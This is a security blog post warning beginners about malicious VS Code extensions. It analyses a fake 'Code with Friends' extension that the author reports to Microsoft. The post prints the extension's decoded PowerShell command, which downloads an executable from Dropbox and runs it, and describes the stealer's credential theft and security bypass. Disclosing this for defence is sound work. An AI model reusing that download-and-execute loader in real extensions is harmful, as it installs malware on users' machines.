The Enemy Within
Hidden dangers of VS Code extensions
Edit: Microsoft has removed this extension as of 7/3/2023 in response to my report.
Congratulations! You’re learning how to code.
It’s time to get your VS Code up and running.
VS code has a marketplace for extensions, similar to the Chrome store. There’s extensions for themes, language formatting, syntax highlighting, remote connections, and nearly anything else you can think of. Some are insanely popular:
Notice the verified checkpoint on three of those. That’s typically a good sign meaning that the publisher is verified by Microsoft. While the majority of these extensions, even ones that don’t have millions of installs are safe to use, there are always risks when installing something as a plugin or add-on within your system. Extensions have the ability to execute code both in and outside of VS Code and that can bring wonderful opportunities for a bad actor to do unexpected things.
Malicious Extensions
What does that look like?
Malicious extensions could do a range of things including: steal passwords, download additional software like ransomware or remote access programs, steal documents, or record the screen and log keyboard entries.
How do they do it?
Typically the extensions have obfuscated (hidden) code inside them that is run when the user loads or uses the extension. Often, the extension works as advertised, but ALSO does the unexpected thing. They tend to masquerade as similar names to popular extensions so they will show up when someone is searching for ‘python’ or ‘prettier’ or ‘dracula’ (a popular theme). Recently there were some malicious extensions with the names ‘prettiest-java’ and ‘darcula’ but the tags and images looked just like the real extension.
Microsoft has vowed to crack down on these, but they are still easily found.
Coding together
Collaborative coding is a really great way to learn. There are probably several ways to code with friends.
Awesome, I was looking for that. Here’s what the developer says:
That sounds perfect. Let’s get that.
DO NOT ACTUALLY DO THAT
Code with Friends is actually a password stealer, discord token stealer, and remote access software.
Extensions comes in a .vsix format. It’s essentially a .zip file so you can change the name and then extract the archive. You will get this:
Looking at its package.json file:
Wait…what?! This extension is executing a PowerShell command…
What is the command?
Aww crap, it’s encoded. We can fix that!
powershell Invoke-WebRequest -Uri
"https://dl.dropbox.com/s/5mp5s3ta5skt5rv/[removed]?dl=0"
-OutFile "~/tmp-lvnsoasss.exe"; Invoke-Expression "~/tmp-lvnsoasss.exe"I added new lines to make it easier to read, but this extension goes out to DropBox and downloads a new file and then executes that file.
That should be enough to have my antivirus flag it…Nope. Bitdefender is silent.
Actually, they are all silent about this file according to VirusTotal:
Is it actually malicious? What does the file do?
I submitted it to JoeSandbox and HybridAnalysis, two well-known virtual code analysis sandboxes to see what would happen if the program was executed.
Things are getting interesting
So not as benign an extension as we thought…
The domains it calls out to are associated with multiple password stealers, trojan horses, and ransomware packages, though this one doesn’t appear to be ransomware. Interestingly enough, it reaches out to Discord to download additional PowerShell scripts to help it bypass more of the security features built into Windows.
This particular one was not detected by any of the main anti-virus and anti-malware software packages though I suspect it’s because it is very new, but they now have the hash since I sent it to their database.
The VS Code marketplace was alerted to the malicious software and I will provide an update when/if they respond or take the package down.
Final thoughts
Be careful what you install for extensions. Look for verified developers with the blue checkmark. Make sure that what you click on is what you expect and not a slightly misspelled version to trick you. If all else fails, ask a friend to check it out first.
